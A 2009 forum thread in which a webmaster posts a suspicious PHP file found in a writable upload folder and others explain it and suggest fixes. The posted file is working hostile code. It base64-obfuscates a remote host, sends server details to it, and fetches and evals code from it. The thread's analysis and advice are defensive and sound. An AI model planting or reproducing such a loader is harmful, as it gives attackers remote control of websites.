Beedge Posted March 5, 2009 Share Posted March 5, 2009 I found a file with the following code on my server in a folder with MOD 777 I suspect it is a hacking attempt.. can anyone tell me whats going on? Thanks~! <? error_reporting(0); $a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI); $d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF); $e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING); $f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER); $g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR); $i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME); $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE); $z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu"); if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="ade11da1971ab70623dbc41f2836aa7c") $f=$_REQUEST["id"]; if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z))); else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c); else{ $cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z); curl_setopt($cu,CURLOPT_RETURNTRANSFER,1); $o=curl_exec($cu); curl_close($cu); eval($o); }; die(); ?> Quote Link to comment Share on other sites More sharing options...
rhodesa Posted March 5, 2009 Share Posted March 5, 2009 yeah, the code is trying to include a file from: http://ads3.phpsearch.cn and include with it a bunch of stats about your system Quote Link to comment Share on other sites More sharing options...
Mchl Posted March 5, 2009 Share Posted March 5, 2009 Oh my. I just love the content of this page. What is this site? This site helps webmasters to earn money with their sites. How it works? Our program generate traffic from search engines and display advertising. What shell I do to start with you ? Signup, get php file from member area, put file into your website directory, modify or create .htaccess in the same directory, and receive money ! it's that easy! XD Quote Link to comment Share on other sites More sharing options...
Beedge Posted March 5, 2009 Author Share Posted March 5, 2009 Any suggestions on any measures I could take to make my site safe from this? Quote Link to comment Share on other sites More sharing options...
kickstart Posted March 5, 2009 Share Posted March 5, 2009 Hi Assuming it is a dodgy site (and I wouldn't trust it) then just delete it. However you could do with knowing how it got there in the first place. All the best Keith Quote Link to comment Share on other sites More sharing options...
kenrbnsn Posted March 5, 2009 Share Posted March 5, 2009 Another reason to turn off short tags... With short tags off, this code would never be executed... Ken Quote Link to comment Share on other sites More sharing options...
kickstart Posted March 5, 2009 Share Posted March 5, 2009 Hi Bit more of a look and it appears that the page it goes to is http://ads3.phpsearch.cn (as mentioned by rhodesa). However if you go directly there it does a redirect elsewhere (puts /en/ on the end), unless you put a random query string on the end when it does nothing. All the best Keith Quote Link to comment Share on other sites More sharing options...
rhodesa Posted March 5, 2009 Share Posted March 5, 2009 haha...it has a report abuse link... Quote Link to comment Share on other sites More sharing options...
Beedge Posted March 5, 2009 Author Share Posted March 5, 2009 I think the worrying thing is how did it get on my server in the first place...? and how can I prevent similar scripts saving themselves on it.. I have to make the folder writable because the app on the server allows users to upload files to this folder any suggestions? Quote Link to comment Share on other sites More sharing options...
kickstart Posted March 5, 2009 Share Posted March 5, 2009 Hi How locked down are the scripts that allow users to do uploads? All the best Keith Quote Link to comment Share on other sites More sharing options...
rhodesa Posted March 5, 2009 Share Posted March 5, 2009 well...that would be my first guess is that exploited your uploader. what does your upload code do to verify the stuff being uploaded is acceptable? Quote Link to comment Share on other sites More sharing options...
waynew Posted March 5, 2009 Share Posted March 5, 2009 Post your upload code and I'm sure we'll see if it's safe or not. Also, change your ftp details just incase. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.